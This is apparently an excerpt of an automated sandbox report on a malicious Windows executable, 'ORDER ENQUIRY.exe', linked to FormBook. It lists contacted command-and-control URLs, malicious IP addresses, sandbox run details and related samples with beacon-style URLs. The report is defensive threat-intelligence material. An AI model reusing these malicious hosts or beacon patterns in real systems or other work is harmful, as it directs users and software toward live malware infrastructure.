                                                                        http://www.valo.gamesexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://www.avai66.xyz/hy08/www.cheaplaptops.bizexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://www.raidsa.xyz/hy08/www.manhuafeifei.xyzexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://www.mksport-app.comReferer:explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://www.mksport-app.com/hy08/www.raidsa.xyzexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  http://www.avai66.xyzReferer:explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://www.google.comORDER ENQUIRY.exefalse
                                                                                      unknown
                                                                                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000004.00000002.4560565201.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2117240871.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://www.hemcksqa.net/hy08/jexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://wns.windows.com/)sexplorer.exe, 00000004.00000000.2114025669.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000003.3100426782.000000000C85F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2117735583.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4562642663.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://www.mksport-app.com/hy08/explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                http://www.21556934.comReferer:explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://www.btcrenaissance.net/hy08/explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    http://www.valo.games/hy08/www.bodgion.xyzexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      http://www.hemcksqa.netexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://www.wergol.comexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://www.bodgion.xyzReferer:explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            http://www.yc23w.top/hy08/www.hemcksqa.netexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://www.cheaplaptops.biz/hy08/www.btcrenaissance.netexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://www.21556934.com/hy08/explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  http://www.bodgion.xyzexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://www.wergol.com/hy08/explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://www.raidsa.xyzReferer:explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://www.horxncnt.xyz/hy08/www.cttlca.clickexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          http://www.wergol.comReferer:explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            http://www.cttlca.clickReferer:explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              http://www.flywatchsecurity.com/hy08/explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://outlook.comexplorer.exe, 00000004.00000003.3100033957.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095675812.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4557514681.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2114025669.0000000009B90000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://www.cloudflare.com/5xx-error-landingexplorer.exe, 00000004.00000002.4565253332.00000000114CF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4552234596.000000000529F000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://www.hemcksqa.net/hy08/explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://www.21556934.com/hy08/www.valo.gamesexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://www.horxncnt.xyzReferer:explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://www.cttlca.clickexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://www.yc23w.top/hy08/explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://www.os9user.comexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://www.hemcksqa.net/hy08/Aexplorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://android.notify.windows.com/iOSexplorer.exe, 00000004.00000000.2111653112.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://www.21556934.comexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  http://www.avai66.xyz/hy08/explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://www.cheaplaptops.bizReferer:explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://www.yc23w.topexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        http://www.cheaplaptops.bizexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          http://www.manhuafeifei.xyz/hy08/explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://www.mksport-app.comexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://api.msn.com/explorer.exe, 00000004.00000002.4556219779.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2114025669.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://www.bodgion.xyz/hy08/explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://www.manhuafeifei.xyzReferer:explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://flywatchsecurity.com/hy08?GxlX=KVcwHz5T5zR/xh5veJhw4peaZs963mOOXmZZz4i4ompoXg80SoxOBoRtYZYOLexplorer.exe, 00000004.00000002.4565253332.00000000114CF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4552234596.000000000529F000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    http://crl.vexplorer.exe, 00000004.00000000.2099752489.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4550702238.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.os9user.com/hy08/www.mksport-app.comexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                        199.59.243.227
                                                                                                                                                                        www.os9user.comUnited States
                                                                                                                                                                        395082BODIS-NJUStrue
                                                                                                                                                                        154.221.68.229
                                                                                                                                                                        www.mksport-app.comSeychelles
                                                                                                                                                                        134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                                                                                                                        23.227.38.74
                                                                                                                                                                        shops.myshopify.comCanada
                                                                                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                                                                                        3.33.130.190
                                                                                                                                                                        raidsa.xyzUnited States
                                                                                                                                                                        8987AMAZONEXPANSIONGBtrue
                                                                                                                                                                        154.197.185.220
                                                                                                                                                                        www.horxncnt.xyzSeychelles
                                                                                                                                                                        133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKtrue
                                                                                                                                                                        151.101.0.119
                                                                                                                                                                        flywatchsecurity.comUnited States
                                                                                                                                                                        54113FASTLYUStrue
                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                        Analysis ID:1523220
                                                                                                                                                                        Start date and time:2024-10-01 10:04:08 +02:00
                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                        Overall analysis duration:0h 11m 9s
                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                        Report type:full
                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                        Number of analysed new started processes analysed:9
                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                        Number of injected processes analysed:1
                                                                                                                                                                        Technologies:
                                                                                                                                                                        • HCA enabled
                                                                                                                                                                        • EGA enabled
                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                        Sample name:ORDER ENQUIRY.exe
                                                                                                                                                                        Detection:MAL
                                                                                                                                                                        Classification:mal100.troj.evad.winEXE@8/1@11/6
                                                                                                                                                                        EGA Information:
                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                        HCA Information:
                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                        • Number of executed functions: 127
                                                                                                                                                                        • Number of non-executed functions: 299
                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                        • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                        04:05:04API Interceptor1x Sleep call for process: ORDER ENQUIRY.exe modified
                                                                                                                                                                        04:05:12API Interceptor7645146x Sleep call for process: explorer.exe modified
                                                                                                                                                                        04:05:48API Interceptor7187700x Sleep call for process: colorcpl.exe modified
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        199.59.243.227https://conbassecomlogii.godaddysites.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • cbcoinbasepremiunm.great-site.net/_tr
                                                                                                                                                                        https://kuconlogin-ui.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • ww25.fladestateins.com/_tr
                                                                                                                                                                        SecuriteInfo.com.suspected.of.Trojan.Downloader.gen.13209.11014.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • www.rjwn.com/btvuYqzds.js
                                                                                                                                                                        nBjauMrrmC.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • www.runccl.com/btrd/?XBZp7=lTrl&tTuD=C3V55vncN7yVAjAcRBQureN2DAJdCLOy0KVWQyL7L2n53NJTQKRDeKbykJZyPZM1JLvC
                                                                                                                                                                        ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • www.care-for-baby-1107.xyz/cxj4/
                                                                                                                                                                        z61SwiftCopyOfPayment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • www.knee-pain-treatment-140741.xyz/jd21/?pPA800q0=yDnXSEuFFI5Fa7EZVwfMYj+SV8a9unqzRGp9lcINeNkO/Fjw4nnZoS+sdxtHpipwBukZUQVhVg==&SZ=dnxdCh7P22ilbRg
                                                                                                                                                                        QlHhDu2uh1.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • www.donante-de-ovulos.biz/ej48/
                                                                                                                                                                        PO23100072.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • www.donante-de-ovulos.biz/8lrv/
                                                                                                                                                                        RFQ urrgently.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • www.care-for-baby-1107.xyz/cxj4/
                                                                                                                                                                        PO-000001488.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • www.donante-de-ovulos.biz/8lrv/
                                                                                                                                                                        23.227.38.74ORDER_1105-19-24-3537.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • www.day2go.net/rn94/?jDHh=Ls1ijzPDaFH4ewLYvuUNL8D06n2bzs/1tKV87wXNHEYKjENRXhu0pLj1Kv8q6blj9L7T&9r9Hc=ytxTjD5hRxA
                                                                                                                                                                        Specification and Quantity Pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • www.tuktukwines.com/n7ak/
                                                                                                                                                                        r8ykXfy52F9CXd5d.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • www.sdcollections.shop/he2a/?EhCdVX=K85VkNX2gzFTaVwdkebjgBMLzwQ20gXAGOHRXkR02nlgeTA1vgIL3XNP4/YsxR0Bd308&Ir=X2JLBxZp
                                                                                                                                                                        0nazQxrt5MZ5BRK.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • www.sdcollections.shop/he2a/?RlXX=K85VkNX2gzFTaVwdkebjgBMLzwQ20gXAGOHRXkR02nlgeTA1vgIL3XNP480K2QI5QWVnx/JXOA==&DvU8k=hbjlAVS0fTh
                                                                                                                                                                        ojtBIU0jhM.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                        • www.faredeal.online/v15n/?qN9=EFNxULM0Cf1t&jL0=ukmuyFp122ER9SkUd0Oy5jDnVATzXW6kTvhnBjXlJsYO+LS6EgGMB9Jvm3Bl806Q2DBF
                                                                                                                                                                        PDPUOIE76867 PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • www.sdcollections.shop/he2a/?5jE=K85VkNWCgTAjHltp4ubjgBMLzwQ20gXAGOHRXkR02nlgeTA1vgIL3XNP4/YJqgEBd3ox&ZN9Ls=9rCTo2P0wPzDj0p
                                                                                                                                                                        LYONSOFT, COOP.V. - Env#U00edo orden 240187 fecha 02-09-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • www.vanguardcoffee.shop/rn94/?D8v=8pGtVJo0up&Rfg=24QTUhZRstyZshAJnYZI2UxfXBs/uV+QALIDsDsnR/VZc8/4uu3qctyboRQgkU7gUCap
                                                                                                                                                                        Etisalat Summary Bill for the Month of August.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • www.melliccine.com/pt46/?BXIxB=FNzjLCNxKg4LnG2n+y3Cc1p/SDbqNFm/9WFnTrWlxnnrh9nJEYJm3P779kB2uMZreiO6&-ZYp=fvRlPd_pa8MLs2
                                                                                                                                                                        MAPAL AMENDED PI SO23000680.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • www.valerieomage.com/hsmv/
                                                                                                                                                                        Payment Advice - Ref[GLV407423235].scr.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • www.valerieomage.com/hsmv/
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        www.horxncnt.xyzS04307164.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                        • 154.204.95.140
                                                                                                                                                                        www.os9user.comPURCHASING ORDER.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                        • 199.59.243.226
                                                                                                                                                                        shops.myshopify.comhttps://ebookkeepers.com.pk/Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 23.227.38.74
                                                                                                                                                                        http://fix-bill.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 23.227.38.74
                                                                                                                                                                        H9DsG7WKGt.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • 23.227.38.74
                                                                                                                                                                        https://cancelar-plan-pr0teccion1.w3spaces.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 23.227.38.74
                                                                                                                                                                        ORDER_1105-19-24-3537.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • 23.227.38.74
                                                                                                                                                                        Specification and Quantity Pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • 23.227.38.74
                                                                                                                                                                        r8ykXfy52F9CXd5d.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • 23.227.38.74
                                                                                                                                                                        t5ueYgHiHnIdeNe.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                        • 23.227.38.74
                                                                                                                                                                        http://chiao1129.github.io/loginGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • 23.227.38.74
                                                                                                                                                                        http://vineethkinik.github.io/Netflix-wesite-frontendGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • 23.227.38.74
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        DXTL-HKDXTLTseungKwanOServiceHKhttp://wap.theblmediagroup.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 122.10.20.83
                                                                                                                                                                        http://v884.cc/Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 45.194.135.236
                                                                                                                                                                        https://walletprotocol.vercel.app/Get hashmaliciousUnknownBrowse
                                                                                                                                                                        • 156.225.111.30
                                                                                                                                                                        SecuriteInfo.com.Linux.Siggen.9999.8861.1379.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                        • 154.85.232.125
                                                                                                                                                                        qxLluDZMxN.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 156.227.0.161
                                                                                                                                                                        QvTbUiFWlo.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                        • 45.194.232.116
                                                                                                                                                                        OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                        • 154.85.183.50
                                                                                                                                                                        5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                        • 154.85.183.50
